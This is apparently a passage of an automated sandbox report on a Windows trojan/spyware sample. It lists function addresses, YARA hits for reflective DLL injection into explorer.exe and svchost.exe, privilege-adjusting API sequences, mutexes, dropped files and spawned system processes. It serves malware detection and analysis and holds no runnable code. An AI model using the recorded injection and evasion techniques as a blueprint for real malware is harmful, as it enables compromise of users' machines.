Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F404F10 18_2_00007FF69F404F10
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F405C74 18_2_00007FF69F405C74
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3FD880 18_2_00007FF69F3FD880
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3F5040 18_2_00007FF69F3F5040
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3F1074 18_2_00007FF69F3F1074
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3F28C0 18_2_00007FF69F3F28C0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3E979B 18_2_00007FF69F3E979B
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3E9FCD 18_2_00007FF69F3E9FCD
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3F0E70 18_2_00007FF69F3F0E70
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F402F20 18_2_00007FF69F402F20
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3F1F30 18_2_00007FF69F3F1F30
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3FFBD8 18_2_00007FF69F3FFBD8
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F405728 18_2_00007FF69F405728
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3FCD6C 18_2_00007FF69F3FCD6C
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3E95FB 18_2_00007FF69F3E95FB
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3F1484 18_2_00007FF69F3F1484
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3F0C64 18_2_00007FF69F3F0C64
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3F2CC4 18_2_00007FF69F3F2CC4
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F400B84 18_2_00007FF69F400B84
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F4033BC 18_2_00007FF69F4033BC
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3FFBD8 18_2_00007FF69F3FFBD8
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3F73F4 18_2_00007FF69F3F73F4
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3F1280 18_2_00007FF69F3F1280
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3F7AAC 18_2_00007FF69F3F7AAC
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F408A38 18_2_00007FF69F408A38
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3F0A60 18_2_00007FF69F3F0A60
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3E8B20 18_2_00007FF69F3E8B20
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F40518C 18_2_00007FF69F40518C
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3F91B0 18_2_00007FF69F3F91B0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3FD200 18_2_00007FF69F3FD200
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC2D030 18_2_00007FFDFFC2D030
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC4F000 18_2_00007FFDFFC4F000
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC22FA0 18_2_00007FFDFFC22FA0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC2FF60 18_2_00007FFDFFC2FF60
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFCC5E64 18_2_00007FFDFFCC5E64
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFCC8DF8 18_2_00007FFDFFCC8DF8
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC50E15 18_2_00007FFDFFC50E15
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC92C48 18_2_00007FFDFFC92C48
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC87BFC 18_2_00007FFDFFC87BFC
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC2FBE0 18_2_00007FFDFFC2FBE0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC25B5C 18_2_00007FFDFFC25B5C
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC3DAC0 18_2_00007FFDFFC3DAC0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC92A68 18_2_00007FFDFFC92A68
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC328B0 18_2_00007FFDFFC328B0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC28854 18_2_00007FFDFFC28854
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC62740 18_2_00007FFDFFC62740
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC226F8 18_2_00007FFDFFC226F8
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC316D0 18_2_00007FFDFFC316D0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC3F5A4 18_2_00007FFDFFC3F5A4
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC2F520 18_2_00007FFDFFC2F520
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC4C429 18_2_00007FFDFFC4C429
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC2C360 18_2_00007FFDFFC2C360
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC42384 18_2_00007FFDFFC42384
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC2233C 18_2_00007FFDFFC2233C
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC28310 18_2_00007FFDFFC28310
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC30300 18_2_00007FFDFFC30300
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC462D0 18_2_00007FFDFFC462D0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC23274 18_2_00007FFDFFC23274
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC41200 18_2_00007FFDFFC41200
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC3D120 18_2_00007FFDFFC3D120
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFCB00BC 18_2_00007FFDFFCB00BC
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE13316AE4 18_2_00007FFE13316AE4
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE13312DD0 18_2_00007FFE13312DD0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE133371CC 18_2_00007FFE133371CC
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE1333D130 18_2_00007FFE1333D130
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE148B3CF0 18_2_00007FFE148B3CF0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE148B1A80 18_2_00007FFE148B1A80
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE148B521C 18_2_00007FFE148B521C
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE148B2D30 18_2_00007FFE148B2D30
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE148B2630 18_2_00007FFE148B2630
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE148B3140 18_2_00007FFE148B3140
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE148B1A80 18_2_00007FFE148B1A80
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE148B37B0 18_2_00007FFE148B37B0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe 9053B6BBAF941A840A7AF09753889873E51F9B15507990979537B6C982D618CB
Found potential string decryption / allocating functions
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF6EEF21050 appears 105 times
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Code function: String function: 00007FF7821C1050 appears 105 times
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: String function: 00007FF69F3E25F0 appears 100 times
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: String function: 00007FF69F3E2760 appears 36 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00007FF63A831050 appears 105 times
Source: C:\Windows\System32\msiexec.exe Code function: String function: 00007FF7F2D01050 appears 105 times
Source: C:\Windows\System32\audiodg.exe Code function: String function: 00007FF6626D1050 appears 105 times
PE file does not import any functions
Source: api-ms-win-core-string-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.17.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.1816351997.00000000009B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameServices.exe2 vs file.exe
Source: file.exe, 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameServices.exe2 vs file.exe
Source: file.exe, 00000000.00000003.1816446381.00000000009C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameServices.exe2 vs file.exe
Source: file.exe, 00000000.00000002.1816809093.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameServices.exe2 vs file.exe
Source: file.exe, 00000000.00000003.1816215024.00000000009B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameServices.exe2 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameServices.exe2 vs file.exe
Yara signature match
Source: 4.2.explorer.exe.a020000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.c350000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.0.explorer.exe.a020000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.cb95950.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.e8f0000.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.svchost.exe.1301d095000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.svchost.exe.1301d095000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.e8f0000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.10d60000.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.3.explorer.exe.cb95950.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.e8a0000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.0.explorer.exe.f4a0000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.0.explorer.exe.a020000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.cb95950.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.f4a0000.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.0.explorer.exe.e8a0000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.0.explorer.exe.e8a0000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.0.explorer.exe.e8f0000.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.3.explorer.exe.cb95950.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.c350000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.0.explorer.exe.e8f0000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.0.explorer.exe.c350000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.a020000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.0.explorer.exe.c350000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.f4a0000.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.10d60000.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.0.explorer.exe.f4a0000.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.e8a0000.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000002.00000002.3071197547.000001301D095000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000000.1853448227.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000000.1853992940.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000000.1850269906.000000000A020000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000000.1853413572.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000000.1851595360.000000000C350000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@29/56@0/1
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3E29E0 GetLastError,FormatMessageW,MessageBoxW, 17_2_00007FF69F3E29E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A834168 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle, 0_2_00007FF63A834168
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A833FE8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 0_2_00007FF63A833FE8
Source: C:\Windows\System32\svchost.exe Code function: 2_2_00007FF6EEF24168 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle, 2_2_00007FF6EEF24168
Source: C:\Windows\System32\svchost.exe Code function: 2_2_00007FF6EEF23FE8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 2_2_00007FF6EEF23FE8
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F3490 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 4_2_0E8F3490
Source: C:\Windows\explorer.exe Code function: 4_2_0F4A3490 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 4_2_0F4A3490
Source: C:\Windows\explorer.exe Code function: 4_2_10D63490 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 4_2_10D63490
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Code function: 5_2_00007FF7821C4168 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle, 5_2_00007FF7821C4168
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Code function: 5_2_00007FF7821C3FE8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 5_2_00007FF7821C3FE8
Source: C:\Windows\System32\audiodg.exe Code function: 7_2_00007FF6626D4168 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle, 7_2_00007FF6626D4168
Source: C:\Windows\System32\audiodg.exe Code function: 7_2_00007FF6626D3FE8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 7_2_00007FF6626D3FE8
Source: C:\Windows\System32\msiexec.exe Code function: 8_2_00007FF7F2D04168 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle, 8_2_00007FF7F2D04168
Source: C:\Windows\System32\msiexec.exe Code function: 8_2_00007FF7F2D03FE8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 8_2_00007FF7F2D03FE8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A833F08 CreateToolhelp32Snapshot,Process32FirstW,wcscmp,Process32NextW,CloseHandle, 0_2_00007FF63A833F08
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796 Jump to behavior
Source: C:\Windows\System32\audiodg.exe Mutant created: \Sessions\1\BaseNamedObjects\worker_pPCJtqmKMc
Source: C:\Windows\System32\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\rbNSpGEsyb
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Mutant created: NULL
Source: C:\Windows\System32\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\ZBI
Source: C:\Windows\System32\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\worker_VznLpbPuTg
Source: C:\Windows\System32\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\worker_ZLpjbmHstE
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\4A64.tmp Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\explorer.exe File read: C:\Users\user\Searches\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
